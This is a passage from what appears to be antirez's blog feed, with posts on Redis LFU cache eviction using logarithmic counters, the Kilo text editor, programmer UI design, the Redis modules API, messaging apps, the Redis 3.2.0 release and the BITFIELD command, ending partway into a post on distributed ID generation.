pattern. This tool was used to validate, with a different test, that
the new algorithm worked better with a more real-world-ish workload.
It also uses pipelining and displays the accesses per second, so
it can be used to benchmark different implementations, at least
to check for obvious speed regressions.

Least Frequently Used
===

The reason I’m writing this blog post right now is that a couple
of days ago I worked on a partial reimplementation of, and different
improvements to, the Redis cache eviction code.

Everything started from an open issue: when you have multiple databases
with Redis 3.2, the algorithm makes local choices when evicting. So
if, for example, you have all the keys with a small idle time in DB number 0,
and all the keys with a large idle time in DB number 1, Redis will evict
one key from each DB. A more rational choice is of course to start
evicting keys from DB number 1, and only later to evict the other keys.

This is usually not a big deal, since when Redis is used as a cache it
is rarely used with multiple DBs; however this is how I started to work
on the eviction code again. Eventually I was able to modify the pool
to include the database ID, and to use a single pool for all the DBs
instead of multiple pools. It was slower at first, but by profiling
and tuning the code, eventually it was around 20% faster than the
original implementation.

However my curiosity for this subsystem of Redis was stimulated again
at that point, and I wanted to improve it. I spent a couple of days
trying to improve the LRU implementation: use a bigger pool maybe?
Account for the time that passes when selecting the best key?

After some time, and after refining my tools, I understood that the
LRU algorithm was limited by the amount of data sampled in the database,
and was otherwise very good and hard to improve. This is, actually,
kind of evident from the image showing the different algorithms:
sampling 10 keys per cycle, the algorithm was almost as accurate as
theoretical LRU.

Since the original algorithm was hard to improve, I started to test
new algorithms. If we rewind a bit to the start of the blog post, we
said that LRU is actually kind of a trick. What we really want is to
retain the keys that have the maximum probability of being accessed in
the future, that is, the keys *most frequently accessed*, not the ones
with the latest access.

The algorithm evicting the keys with the least number of accesses
is called LFU. It means Least Frequently Used, which is the property
of the keys that it attempts to evict in order to make space for new keys.

In theory LFU is as simple as associating a counter to each key. At
every access the counter gets incremented, so that we know that a given
key is accessed more frequently than another key.

Well, there are at least a few more problems, not specific to Redis,
general issues of LFU implementations:

1. With LFU you cannot use the “move to head” linked list trick used for LRU in order to keep the elements sorted for eviction in a simple way, since keys must be ordered by number of accesses in “perfect LFU”. Moving the accessed key to the right place can be problematic because there could be many keys with the same score, so the operation can be O(N) in the worst case, even if the key frequency counter changed just a little. Also, as we’ll see in point “2”, the access counter does not always change just a little: there are also sudden large changes.

2. LFU can’t really be as trivial as just incrementing the access counter
on each access. As we said, access patterns change over time, so a key
with a high score needs to see its score reduced over time if nobody
keeps accessing it. Our algorithm must be able to adapt over time.

In Redis the first problem is not a problem: we can just use the trick
used for LRU, random sampling with the pool of candidates. The second
problem remains. So normally LFU implementations have some way to
decrement, or halve, the access counter from time to time.

Implementing LFU in 24 bits of space
===

LFU has its own implementation peculiarities, however in Redis all
we can use is our 24 bit LRU field in order to model LFU. To implement
LFU in just 24 bits per object is a bit more tricky.

What we need to do in 24 bits is:

1. Some kind of access frequency counter.
2. Enough information to decide when to halve the counter.

My solution was to split the 24 bits into two fields:

     16 bits       8 bits
+----------------+--------+
| Last decr time |  LOG_C |
+----------------+--------+

The 16 bit field is the last decrement time, so that Redis knows the
last time the counter was decremented, while the 8 bit field is the
actual access counter.

You are thinking that it’s pretty fast to overflow an 8 bit counter,
right? Well, the trick is, instead of using just a counter, I used
a logarithmic counter. This is the function that increments the
counter during accesses to the keys:

uint8_t LFULogIncr(uint8_t counter) {
    if (counter == 255) return 255;
    double r = (double)rand()/RAND_MAX;
    double baseval = counter - LFU_INIT_VAL;
    if (baseval < 0) baseval = 0;
    double p = 1.0/(baseval*server.lfu_log_factor+1);
    if (r < p) counter++;
    return counter;
}

Basically, the greater the value of the counter, the less probable it
is that the counter will actually be incremented: the code above computes
a number ‘p’ between 0 and 1 which gets smaller and smaller as the counter
increases. Then it extracts a random number ‘r’ between 0 and 1 and only
increments the counter if ‘r < p’ is true.
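
To put a number on it, assuming the default lfu_log_factor of 10 and the initial value of 5 that is discussed later in this post: an increment from a counter value of 10 to 11 happens with probability p = 1/((10-5)*10+1) = 1/51, so that single step requires, on average, 51 more accesses.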

You can configure how aggressively the counter is incremented
via redis.conf parameters, but for instance, with the default
settings, this is what happens:

After 100 hits the value of the counter is 10
After 1000 hits it is 18
After 100k hits it is 142
After 1 million hits it reaches the 255 limit and no longer increments

Now let’s see how this counter is decremented. The 16 bits are used in
order to store the least significant bits of the UNIX time converted
to minutes. As Redis performs random sampling scanning the key space
in search of keys to populate the pool, all keys that are encountered
are checked for decrement. If the last decrement was performed more than
N minutes ago (with N configurable), the value of the counter is halved
if it is a high value, or just decremented if it is a lower value
(in the hope that we can better discriminate among keys with few
accesses, given that our counter resolution is very small).
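
Conceptually, the decrement step could look like the following sketch (it just follows the description above, it is not the actual Redis code; in particular the threshold separating “high” and “low” counter values is an arbitrary choice here):

#include <stdint.h>

/* 'ldt' is the 16 bit last decrement time in minutes, 'counter' the
 * 8 bit logarithmic counter, 'period' the configurable N minutes. */
uint8_t lfuDecay(uint8_t counter, uint16_t ldt, uint16_t now_min,
                 uint16_t period)
{
    /* Unsigned subtraction handles the 16 bit wrap around. */
    uint16_t elapsed = (uint16_t)(now_min - ldt);
    if (elapsed >= period && counter > 0) {
        if (counter > 10)
            counter /= 2;  /* High value: halve it. */
        else
            counter--;     /* Low value: just decrement it. */
    }
    return counter;
}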

There is yet another problem: new keys need a chance to survive after
all. In vanilla LFU a just-added key has an access score of 0, so it
is a very good candidate for eviction. In Redis new keys start with
an LFU value of 5. This initial value is accounted for in the increment
and halving algorithms. Simulations show that with this change keys have
some time to accumulate accesses: keys with a score less than 5 (keys
that have not been active for a long time) will be preferred for eviction.

Code and performances
===

The implementation described above can be found in the “unstable” branch
of Redis. My initial tests show that it outperforms LRU with power-law
access patterns, while using the same amount of memory per key. However
real world access patterns may be different: time and space locality
of accesses may change in very different ways, so I’ll be very happy
to learn from real world use cases how LFU is performing, and how the
two parameters that you can tune in the Redis LFU implementation change
the performance for different workloads.

Also an OBJECT FREQ subcommand was added in order to report the
frequency counter of a given key: this can be useful both to
observe an application access pattern and to debug the LFU
implementation.

Note that switching at runtime between the LRU and LFU policies will
have the effect of starting with almost random eviction, since the
metadata accumulated in the 24 bits does not match the meaning of the
newly selected policy. However over time it adapts again.

There are probably many improvements possible.

Ben Manes pointed me to this interesting paper, describing an algorithm
called TinyLFU (http://arxiv.org/pdf/1512.00727.pdf).

The paper contains a very neat idea: instead of remembering the
access frequency of the current objects, let’s (probabilistically)
remember the access frequency of all the objects seen so far. This
way we can even refuse to create new keys if, from their name, we
believe they are likely to get few accesses, so that no eviction is
needed at all when evicting a key would mean lowering the hits/misses
ratio.

My feeling is that this technique, while very interesting for plain
GET/SET LFU caches, is not applicable to the data structure server
nature of Redis: users expect a key to exist for at least a few
milliseconds after being created. Refusing the key creation entirely
seems semantically wrong for Redis.

However Redis maintains the LFU information when a key is overwritten, so
for example after a:

SET oldkey some_new_value

The 24 bit LFU counter is copied to the new object associated to the
old key.

The new eviction code of Redis unstable contains other good news:

1. Policies are now “cross DB”. In the past Redis made local choices as explained at the start of this blog post. Now this is fixed for all the policies, not just LRU.

2. The volatile-ttl eviction policy, which is the one that evicts based on the remaining time to live of keys with an expire set, now uses the pool like the other policies.

3. Performance is better thanks to reusing SDS objects in the pool of keys.

This post ended up a lot longer than I expected it to be, but I hope it offered a few insights on the new stuff and the improvements to the old things we already had. Redis, more than a “solution” to a specific problem, is a generic tool. It’s up to the sensible developer to apply it in the right way. Many people use Redis as a caching solution, so improvements in this area are investigated from time to time.

Hacker News comments: https://news.ycombinator.com/item?id=12185534
http://antirez.com/news/109
Writing an editor in less than 1000 lines of code, just for fun http://antirez.com/news/108 http://antirez.com/news/108 Sun, 10 Jul 2016 10:51:11 +0000
Screencast here: https://asciinema.org/a/90r2i9bq8po03nazhqtsifksb

For the sentimentalists, keep reading…

A couple weeks ago there was this news about the Nano editor no longer being part of the GNU project. My first reaction was, wow people still really care about an old editor which is a clone of an editor originally part of a terminal based EMAIL CLIENT. Let’s say this again, “email client”. The notion of email client itself is gone at this point, everything changed. And yet I read, on Hacker News, a number of people writing how they were often saved by the availability of nano on random systems, doing system administrator tasks, for example. Nano is also how my son wrote his first program in C. It’s an acceptable experience that does not require past experience editing files.

This is how I started to think about writing a text editor way smaller than Nano itself. Just for fun, basically, because I like and admire small programs.

How lame, useless, what a waste of time it is today to write an editor! We are supposed to write shiny incredible projects, very cool, very complex, valuable stuff. But sometimes making things without a clear purpose is refreshing. There were also memories…

I remember my first experiences with the Commodore 16 in-ROM assembler, and all the home computers and BASIC interpreters I used later in my childhood. An editor is a fundamental connection between the human and the machine. It allows the human to write something that the computer can interpret. The blinking of a square prompt is something that many of us will never forget.

Well, all nice, but my time was very limited. A few hours across two weekends with programmed family activities and meat to prepare for friends in long barbecue sessions. Maybe I could still write an editor in a few spare hours with some trick. My goal was to write an editor which was very small, no curses, and with syntax highlighting. Something usable, basically. That’s the deal. It’s little stuff, but it is already hard to write all this from scratch in a few hours.

But … wait, I actually wrote an editor in the past: it is part of the LOAD81 project, a Lua based programming environment for children. Maybe I can just reuse it… and instead of using SDL to write on the screen, what about sending VT100 escape sequences directly to the terminal? And I have code for this as well in linenoise, another toy project that eventually found its place in many other serious projects. So maybe mixing the two…

The first week, Saturday morning, I went to the sea, and it was great. Later my brother arrived from Edinburgh to Catania, and at the end of the day we were together in the garden with our laptops, trying to defend ourselves from the 30 degrees we had during the day, so I started to hack the first skeleton of the editor. The LOAD81 code was quite modular, so taking it out of the original project was trivial. I could kind of edit after a few hours, and it was already time to go to bed. The next day I worked on it again before leaving for the sea. My 15yo sleeps till 1pm, as I did when I was 15yo in summertime after all, so I coded more in sprints of 30 minutes waiting for him to get up, using the rest of the time to play with my wonderful daughter. Finally, late on Sunday night, I tried to fix all the remaining stuff.

Hey, I remember that a few years ago to hack on a project meant to *hack* on it, full time for days. I’m old now, but still young enough to write toy editors and consider it a serious business :-)

However life is hard, and Monday arrived. Real business, no time for toy projects, not even time to release what I got during the weekend… It deserved some minimal polishing and a blog post.

I had to wait until this Monday to put my hands on the “Kilo” editor again. It’s called Kilo because it has less than 1024 lines of code. The “cloc” utility, used to count the number of lines of code, told me I still had ~100 lines of space before reaching 1024 LOC, and a serious editor needs a “search” feature after all. So back to the code, trying also to restructure and re-comment it a bit, since you know, when you mix pieces of two projects in a few hours the risk is that the code quality is less than excellent.

Well, now it’s time to release it, end of this crazy project. Maybe somebody will use it as a starting point to write a real editor, or maybe it could be used to write some new interesting CLI that goes beyond the usual REPL style model.

The code is at http://github.com/antirez/kilo

HN comments: https://news.ycombinator.com/item?id=12065217
http://antirez.com/news/108
Programmers are not different, they need simple UIs. http://antirez.com/news/107 http://antirez.com/news/107 Tue, 24 May 2016 15:06:17 +0000 I really mean it when I say *days*, just for the API. Writing drafts, starting the implementation, shaping data structures and calls, and then restarting from scratch to iterate again in a better way, to improve the design and the user facing part.

Why do I do that, delaying features for weeks? Is it really so important?
Programmers are engineers, maybe they should just adapt to whatever API is more convenient for the system exporting it.

Should I really reply to my rhetorical questions? No, it is no longer needed today, and that’s a big win.

I want to assume that at this point it is tacit, taken for granted, that programmers also have user interfaces, and that such user interfaces are so crucial that they completely change the perception of a system. Database query languages, library calls, programming languages, Unix command line tools: they all have a User Interface part. If you use them daily, for you they are more UIs than anything else.

So if this is all well known, why am I here writing this blog post? Because I want to stress how important the concept of simplicity is, not just in graphical UIs, but also in UIs designed for programmers. The act of iterating again and again to find a simple UI solution is not a form of perfectionism, it’s not futile narcissism. It is more an exploration in the design space, which sometimes is huge, made of small variations that make a big difference, and made of big variations that completely change the point of view. There are no rules to follow but your sensibility. Yes there are good practices, but they are not a good compass when the sea to navigate is the one of the design *space*.

So why should programmers have this privilege of good, simple UIs? Sure there is the joy of using something well made, that is great to handle, that feels *right*. But there is a more central question. Learning to configure Sendmail via M4 macros, or struggling with an Apache virtual host setup, is not real knowledge. If such a system one day is no longer in use, what remains in your hands, or better, in your neurons? Nothing. This is ad-hoc knowledge. It is like junk food: empty calories without micronutrients.

For programmers, the micronutrients are the ideas that last for decades, not the ad-hoc junk. I don’t want to ship junk, so I’ll continue to refine my designs before shipping. You should not accept junk: your neurons are better spent learning general concepts. However in part it is inevitable: every system will have something that is not general that we need to learn in order to use it. Well, if that’s the deal, at least let’s make the ad-hoc part a simple one, and if possible, something that is even fun to use.
http://antirez.com/news/107
Redis Loadable Modules System http://antirez.com/news/106 http://antirez.com/news/106 Tue, 10 May 2016 17:02:55 +0000
Modules can be the most interesting feature of a system and the most problematic one at the same
time: API incompatibilities between versions, low quality modules crashing the system, and a lack
of identity for a system that is extendible are all possible problems. So, for years, I managed to avoid adding modules to Redis, and Lua scripting was a good tool to delay their addition. At the same time, years of experience with scripting demonstrated that scripting is a way to “compose” existing features, but not a way to extend the capabilities of a system towards use cases it was not designed to cover.

Previous attempts at modules also showed that one of the main pain points about mixing Redis
and loadable modules is the way modules are bound to the Redis core. In many ways Redis resembles a programming language more than a database. To extend Redis properly, the module needs to have access to the internal API of the system. However, directly exporting the Redis core functions to modules creates huge problems: the module starts to depend on the internal details of Redis, so if the Redis core evolves, the module needs to be rewritten. This creates either a fragile modules ecosystem, or it stops the evolution of the Redis core. Redis internals can’t stop evolving, nor can module developers keep modifying their modules in order to stay in sync with the internals (something that happened in certain popular systems in the past, with poor results).

With all these lessons in mind, I was leaving Catania to fly to Tel Aviv, to have a meeting at
Redis Labs to talk about the roadmap for the future months. One of the topics of our chat was loadable modules. During the flight I asked myself if it was possible to truly decouple the Redis core from the modules API, but still have low level access to directly manipulate Redis data structures. So I immediately started to code something. What I wanted was an extreme level of API compatibility for the future, so that a module written today could work 4 years from now with the same API, regardless of the changes to the Redis core. I also wanted binary compatibility, so that the 4 years old module could even *load* into new Redis versions and work as expected, without even the need to be recompiled.

At the end of the flight I arrived in Tel Aviv with something already working in the “modules” branch. We discussed together how the API should work, and at the end everybody agreed that being able to manipulate Redis internals directly was a fundamental feature. What we wanted to accomplish was to allow Redis developers to create commands as capable as the Redis native commands, and also as fast as the native commands. This cannot be accomplished just with a high level API that calls Redis commands: that is too slow and limited. There is no point in having a Redis modules system that can just do what Lua can already do. You need to be able to say: get me the value associated with this key; what type is it? Do this low level operation on the value. Give me a cursor into the sorted set at this position, go to the next element. And so forth. To create an API that works as an intermediate layer for such low level access is tricky, but definitely possible.

I returned home and started to work on the modules system immediately. After a couple of weeks I had a prototype that was already functional enough to develop interesting modules, featuring low level functions like direct access to the data types, string DMA to poke at the internals of strings without wrappers when needed, a replication API, an interesting sorted set iterator API, and so forth. It looked like a very promising start, however the project was kind of “secret” because initially it was not clear if it was viable. Also we wanted to avoid everybody starting to develop modules while the API was extremely unstable and subject to changes.

The result of this process, while not complete, is very promising, so today I’m announcing the new feature at Redis Conference 2016, and the code was just pushed into the “unstable” branch. But let’s check the API a bit…

Here is a trivial example of what a module can do and how it works. It implements a
“list splice” operation that moves elements from a list to another:

int HelloListSpliceAuto_RedisCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc != 4) return RedisModule_WrongArity(ctx);

    RedisModule_AutoMemory(ctx);

    RedisModuleKey *srckey = RedisModule_OpenKey(ctx,argv[1],
        REDISMODULE_READ|REDISMODULE_WRITE);
    RedisModuleKey *dstkey = RedisModule_OpenKey(ctx,argv[2],
        REDISMODULE_READ|REDISMODULE_WRITE);

    /* Src and dst key must be empty or lists. */
    if ((RedisModule_KeyType(srckey) != REDISMODULE_KEYTYPE_LIST &&
         RedisModule_KeyType(srckey) != REDISMODULE_KEYTYPE_EMPTY) ||
        (RedisModule_KeyType(dstkey) != REDISMODULE_KEYTYPE_LIST &&
         RedisModule_KeyType(dstkey) != REDISMODULE_KEYTYPE_EMPTY))
    {
        return RedisModule_ReplyWithError(ctx,REDISMODULE_ERRORMSG_WRONGTYPE);
    }

    long long count;
    if ((RedisModule_StringToLongLong(argv[3],&count) != REDISMODULE_OK) ||
        (count < 0))
    {
        return RedisModule_ReplyWithError(ctx,"ERR invalid count");
    }

    while(count-- > 0) {
        RedisModuleString *ele;

        ele = RedisModule_ListPop(srckey,REDISMODULE_LIST_TAIL);
        if (ele == NULL) break;
        RedisModule_ListPush(dstkey,REDISMODULE_LIST_HEAD,ele);
    }

    size_t len = RedisModule_ValueLength(srckey);
    RedisModule_ReplyWithLongLong(ctx,len);
    return REDISMODULE_OK;
}

int RedisModule_OnLoad(RedisModuleCtx *ctx) {
    if (RedisModule_Init(ctx,"helloworld",1,REDISMODULE_APIVER_1)
        == REDISMODULE_ERR) return REDISMODULE_ERR;

    if (RedisModule_CreateCommand(ctx,"hello.list.splice.auto",
        HelloListSpliceAuto_RedisCommand,
        "write deny-oom",1,2,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

    return REDISMODULE_OK;
}
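
If you want to try it, building and loading should be more or less a matter of the following steps (assuming the compiler can find redismodule.h; check the INTRO.md document linked below for the exact details):

gcc -fPIC -shared -o helloworld.so helloworld.c
redis-server --loadmodule ./helloworld.so

Then from redis-cli, something like:

127.0.0.1:6379> rpush src a b c
(integer) 3
127.0.0.1:6379> hello.list.splice.auto src dst 2
(integer) 1
127.0.0.1:6379> lrange dst 0 -1
1) "b"
2) "c"

The command pops from the tail of the source list, pushes to the head of the destination list, and replies with the number of elements remaining in the source.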

A big effort went into providing a clean API, and an API that is not prone to misuse.
For example there is support for automatic memory management, so that the context the command
operates on collects the objects that are not explicitly freed by the user, in order to free them when the command returns, if needed. This makes writing modules a lot simpler.

You can find the API documentation here (not perfect, but there is enough to get familiar with it):
https://github.com/antirez/redis/blob/unstable/src/modules/INTRO.md

And the API reference here:
https://github.com/antirez/redis/blob/unstable/src/modules/API.md

And many simple examples of commands here:
https://github.com/antirez/redis/blob/unstable/src/modules/helloworld.c

The API is not yet complete nor stable, and will be released with the next stable version of Redis (likely 4.0). However it is already enough to do a lot of things, and my colleagues did very interesting things with it, from inverted indexes to authentication systems. In the next weeks we’ll fill all the holes: for example there is no low level Set API yet, so you’ll have to use the Call() style API for now. Similarly the iterator is only provided for the sorted set type, and so forth.

But the important point is that the process is now started, and Redis is becoming an extendible system.
I think this will give more power to Redis users, power to go “faster” than the project itself in using Redis to model their problems, with the big promise that, after the Redis 4.0 RC is out, we’ll not break the API for years to come, so that work on modules will not get wasted.
Note that we *can improve* the API, since the module registration asks for a given API version,
so it will be possible to maintain backward compatibility while at the same time releasing new versions of the API.

Soon there will be a Modules Directory where you can register your modules, using redis-cli, into a server that talks the Redis protocol. Unfortunately it was not possible to finish it in time, but it is just a matter of weeks.

I’m very very excited about what will happen now! Modules will have a Bazaar model like clients, so there will not be “official modules”. The good ones will be used for sure, and all will get listed on the Redis site, probably ranked by Github stars or something like that.

I hope many users will become part of the modules ecosystem and make Redis able to solve very specific use cases that it was not wise to solve inside the core, but that are a good fit for modules.

Now I need your feedback while the API is still malleable. Tell me what you think!
http://antirez.com/news/106
Three ideas about text messages http://antirez.com/news/105 http://antirez.com/news/105 Sat, 07 May 2016 18:42:15 +0000
I don’t mind staying disconnected for some time usually. It’s a good time to focus, write some code, or a blog post like this one. However when I’m disconnected, what makes the most difference is not Facebook or Twitter or Github, but the lack of text messages.

At this point text messages are a fundamental thing in my life. They are also probably the main source of distraction. I use messages to talk with my family, even just to communicate between different floors. I use messages with friends to organize dinners and vacations. I even use messages with the plumber or the doctor.

Clearly messages are not going to go away. They need to get better, so I usually tend to think about topics related to messaging applications. The following are three recurrent thoughts I have about this topic.

1. WhatsApp is not used in the US.

Do you know which social network is reshaping the way we communicate in Europe the most? It is the WhatsApp application. Since it is the total standard and an incredible share of the population has it, “WhatsApp Groups” are changing the way people communicate. There is a group for each school class, one for the children and one for the parents. One for families, another for groups of friends. One for the kindergarten of my daughter, where teachers post from time to time pictures of our children doing activities.

WhatsApp is also one of the main pains of modern life. All these groups continuously beep. However what they are doing for society is incredible: they are truly making every human being interconnected. This magic is possible because here in Italy, and in most other EU countries, WhatsApp is *the standard*, so everybody assumes you use it.

To me it is pretty incredible that this is not happening in the US, the place where most social applications are funded and created. Given that in the US there are both Android and iOS phones I wonder what’s stopping this from happening. My guess is that it’s just a matter of time and a unified messaging platform will happen there too.

2. Why voice recognition is not used more.

For people that can write text fast on a real keyboard, the software keyboard of the phone is one of the most annoying things ever. Similarly, teenagers excluded, many other people have issues writing long text messages with a phone keyboard.

At the same time, the voice recognition software of Android, powered by the Google servers, reached a point where it rarely makes errors at all, so why do just a few people use it on a daily basis? My theory is that the user interface to activate and use the voice recognition feature is so bad that it is the main barrier preventing this feature from becoming a big hit.

First you have to find how to activate it, and usually it is not a prominent button on the keyboard. Then there is this delay before it emits a beep and starts to listen, and it’s not clear exactly how to stop it, especially if the environment is loud. The whole thing feels like you are suffering from the servers’ latency, but voice is voice. With delays and an unclear experience you kill the big advantage of talking to your phone. This should just be a “push the button while you talk” thing. When you push the button, the system starts to record your voice immediately and connects asynchronously to the servers. As text arrives back, it is shown to the user. When the user releases the button, the voice thing is done. As simple as that. At the end, the words that were inserted this way could be shown in some special way (like a different gray) in the text area, so that one can tap individual words and select alternatives if there are errors.

Please Google, freaking do that. I wonder if it’s any better on iOS; I haven’t used it for some time at this point.

3. Auto transcription of voice messages.

Since the phone keyboard is such a mess, people are using voice messages more and more, especially with WhatsApp. It is very convenient for people writing messages, since there is the “push and talk” experience that the speech to text feature lacks. However it is not always convenient for the people receiving the message, who may be in an environment where listening to the conversation is not easy.

However there is something that could work in that regard: the WhatsApp (or whatever) servers should automatically transcribe the message to text, so that the user can either play the message or just look at the text, if it’s clear enough. When there are doubts about given words, the text can be highlighted in some way to show the user that it’s better to listen to the voice message since there are unclear words. Still, this could easily make 95% of messages promptly available to the user just by reading.

This way the feature would be friction-less both ways, for the users writing (dictating, actually) and for the users receiving the messages.


TLDR: Messaging is everywhere, make it better.
http://antirez.com/news/105
Redis 3.2.0 is out! http://antirez.com/news/104 http://antirez.com/news/104 Fri, 06 May 2016 11:07:50 +0000
* The GEO API. Index whatever you want by latitude and longitude, and query by radius, with the same speed and ease of use of the other Redis data structures. Here you can find the API documentation: http://redis.io/commands/#geo. Thank you to Matt Stancliff for the initial implementation, that was reworked but is still at the core of the GEO API, and to the developers of ARDB for providing the geo indexing code that Matt used.

* The new BITFIELD command allows using a Redis string as a bit array composed of many integers with user specified size and offset. It supports increments and decrements to exploit these small (or large) integers as counters, with fine control over the overflow behavior. http://redis.io/commands/bitfield. Thanks to Yoav Steinberg for pushing forward this crazy idea and motivating me to write an implementation.

* Many improvements to Redis Cluster, including rebalancing capabilities in redis-trib and better replicas migration. However support for NATted environments and Docker port forwarding, while implemented in the “unstable” branch, was not backported to 3.2 because of maturity concerns.

* Improvements to Lua scripts replication. It is now possible to use “effects replication” to write scripts containing side effects. It’s documented here: http://redis.io/commands/EVAL. Thanks to Yossi Gottlieb for stimulating the addition of this feature and helping in the design.

* We have now a serious Lua scripts debugger: https://www.youtube.com/watch?v=IMvRfStaoyM with support in redis-cli. Thanks to Itamar Haber, developer of non trivial scripts since the start of Lua scripting, who really wanted this feature and helped during the development.

* Redis is now more memory efficient thanks to changes operated by Oran Agra to SDS and the Jemalloc size classes setup. Also we have a new List internal representation contributed by Matt Stancliff which uses just a small percentage of the memory used before to represent large lists!

* Finally slaves and masters are in agreement about what keys are expired during read operations. It was about time :-)

* SPOP now accepts an optional count argument. Thanks to Alon Diamant for providing the initial implementation. I kind of rewrote it later for performance, and we ended up with a pretty fast thing.

* RDB AUX fields. So now your RDB files carry a few pieces of information inside, like the server that generated them, the creation date, and so forth. Hopefully soon (in 3.2.1) we’ll have redis-cli able to parse those fields. It’s a small amount of work, but honestly I’m remembering it only now, while writing these notes.

* RDB loading is faster now.

* Sentinel can now scale to monitoring many masters, but this should be considered more an advanced beta than stable, so please test it in your environment carefully before deploying: a lot of code changed inside Sentinel internals.

* Many more things but this list is already long enough.

A big thank you to all the contributors that made this release possible, to the Redis user base which is lovely and encouraging, and to Redis Labs for sponsoring a lot of the work that went into 3.2.0.

During the previous weeks we also worked on a new interesting feature that will be released in the next versions of Redis; it will be announced during RedisConf 2016 in San Francisco, 10-11 May, so stay tuned!

One note about stability. I keep saying it all the time, but stability in software is not black and white. It’s like pink, yellow and green. No, just kidding. It’s the usual shades of gray. So 3.2.0 looks solid, however it’s fresh meat. Start to use it incrementally and check how it works for you, and please report any issue promptly. However it’s also true that, given that it stayed in RC for a long time, it was already tested by the brave users that needed the new features too much to wait before deploying it.

The 3.2.0 full changelog is here: https://raw.githubusercontent.com/antirez/redis/3.2/00-RELEASENOTES

Redis 3.2.0 can be obtained as a tarball at http://download.redis.io, or by fetching the 3.2.0 tag from Github antirez/redis repository.

Enjoy!
http://antirez.com/news/104
100 more of those BITFIELDs http://antirez.com/news/103 http://antirez.com/news/103 Fri, 26 Feb 2016 15:02:54 +0000
The essence of this command is not new: it was proposed in the past by me and others, but never in a serious way, since the idea always looked a bit strange. We already have bit operations in Redis: certain users love them, it’s a good way to represent a lot of data in a compact way. However so far we handle each bit separately: setting, testing, getting bits, counting all the bits that are set in a range, and so forth.

What about implementing bitfields? Short or large, arbitrary sized integers, at arbitrary offsets, so that I can use a Redis string as an array of 5 bits signed integers, without losing a single bit of juice.

A few days ago, Yoav Steinberg from Redis Labs proposed, in a more serious way, a set of commands on arbitrary sized integers stored at bit offsets. I smiled when I read the email, since this was kind of a secret dream. Starting from Yoav’s proposal and with other feedback from Redis Labs engineers, I wrote an initial specification of a single command with sub-commands, using short names for type definitions, and adding very fine grained control over the overflow semantics.

I finished the first implementation a few minutes ago, since the plan was to release it today, in the hope Redis appreciates that we do actual work on its birthday.

The resulting BITFIELD command supports different subcommands:

SET — Set the specified value and return its previous value.
GET — Get the specified value.
INCRBY — Increment the specified counter.

There is an additional meta command called OVERFLOW, used to set (guess what) the overflow semantics of the commands that will follow (so OVERFLOW can be specified multiple times):

OVERFLOW SAT — Saturation, so that overflowing in one direction or the other will saturate the integer to its maximum (or minimum) value in the direction of the overflow.
OVERFLOW WRAP — This is the usual wrap around, but the interesting thing is that this also works for signed integers, by wrapping towards the most negative or most positive values.
OVERFLOW FAIL — In this mode the operation is not performed at all if the value would overflow.

The integer types can be specified using the “u” or “i” prefix followed by the number of bits, so for example u8, i5, u20 and i53 are valid types. There is a limitation: u64 cannot be specified since the Redis protocol is unable to return 64 bit unsigned integers currently.

It's time for a few examples: in order to increment an unsigned integer of 8 bits I could use:

127.0.0.1:6379> BITFIELD mykey incrby u8 100 1
1) (integer) 3

This is incrementing an unsigned integer, 8 bits, at offset 100 (so the counter starts at the 101st bit of the bitmap).

However there is a different way to specify offsets, that is by prefixing the offset with “#”, in order to say: "handle the string as an array of counters of the specified size, and set the N-th counter". Basically this just means that if I use #10 with an 8 bits type, the offset is obtained by multiplying 8*10; this way I can address multiple counters independently without doing offset math:

127.0.0.1:6379> BITFIELD mykey incrby u8 #0 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u8 #0 1
1) (integer) 2
127.0.0.1:6379> BITFIELD mykey incrby u8 #1 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u8 #1 1
1) (integer) 2

The ability to control the overflow is also interesting. For example an unsigned counter of 1 bit will actually toggle between 0 and 1 with the default overflow policy of “wrap”:

127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 0
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 1
127.0.0.1:6379> BITFIELD mykey incrby u1 100 1
1) (integer) 0

As you can see it alternates 0 and 1.

Saturation can also be useful:

127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -3
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -6
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -8
127.0.0.1:6379> bitfield mykey overflow sat incrby i4 100 -3
1) (integer) -8

As you can see, decrementing by 3 never goes under -8.

Note that you can carry out multiple operations in a single command. It always returns an array of results:

127.0.0.1:6379> BITFIELD mykey get i4 100 set u8 200 123 incrby u8 300 1
1) (integer) -8
2) (integer) 123
3) (integer) 7

The intended usage for this command is real time analytics, A/B testing, showing slightly different things to users every time by using the overflowing of integers. Packing so many small counters in a shared and memory efficient way can be exploited in many ways, but that’s left as an exercise for the talented programmers of the Redis community.

The command will be backported into the stable version of Redis in the next weeks, so this will be usable very soon.

Curious about the implementation? It’s probably more complex than you would expect: https://github.com/antirez/redis/commit/70af626d613ebd88123f87a941b0dd3570f9e7d2
http://antirez.com/news/103
The binary search of distributed programming http://antirez.com/news/102 http://antirez.com/news/102 Sat, 13 Feb 2016 16:49:13 +0000
This apparently simple problem can be more complex than it looks at first glance, considering that it must ensure that, in all conditions, there is a safety property which is always guaranteed: the ID generated is always greater than all the past IDs generated, and the same ID cannot be generated multiple times. This must hold during network partitions and other failures. The system may just become unavailable if less than a majority of nodes can be reached, but it must never provide the wrong answer (note: as we'll see this algorithm has another liveness issue that happens during high load of requests).

So for the sake of playing a bit more with distributed systems algorithms, and learning a bit more in the process, I tried to find a solution.
Actually I was aware of an algorithm that could solve the problem. It’s an inefficient one, not suitable to generate tons of IDs per second. Many complex distributed algorithms, like Raft and Paxos, use it as a step in order to get monotonically increasing IDs, as a foundation to mount the full set of properties they need to provide. This algorithm is fascinating since it’s extremely easy to understand and implement, and because it’s very intuitive to understand *why* it works. I could say it is the binary search of distributed algorithms: something easy enough, but smart enough, to let newcomers to distributed programming have an ah!-moment.

However I had to modify the algorithm in order to adapt it to be implemented on the client side. Hopefully it is still correct (feedback appreciated). While I’m not going to use this algorithm in order to improve Redlock (see my previous blog post), I think that trying to solve this kind of problem is both a good exercise, and it may be an interesting read for people approaching distributed systems for the first time, looking for simple problems to play with in real world systems.

## How does it work?

The algorithm requirements are the following two:

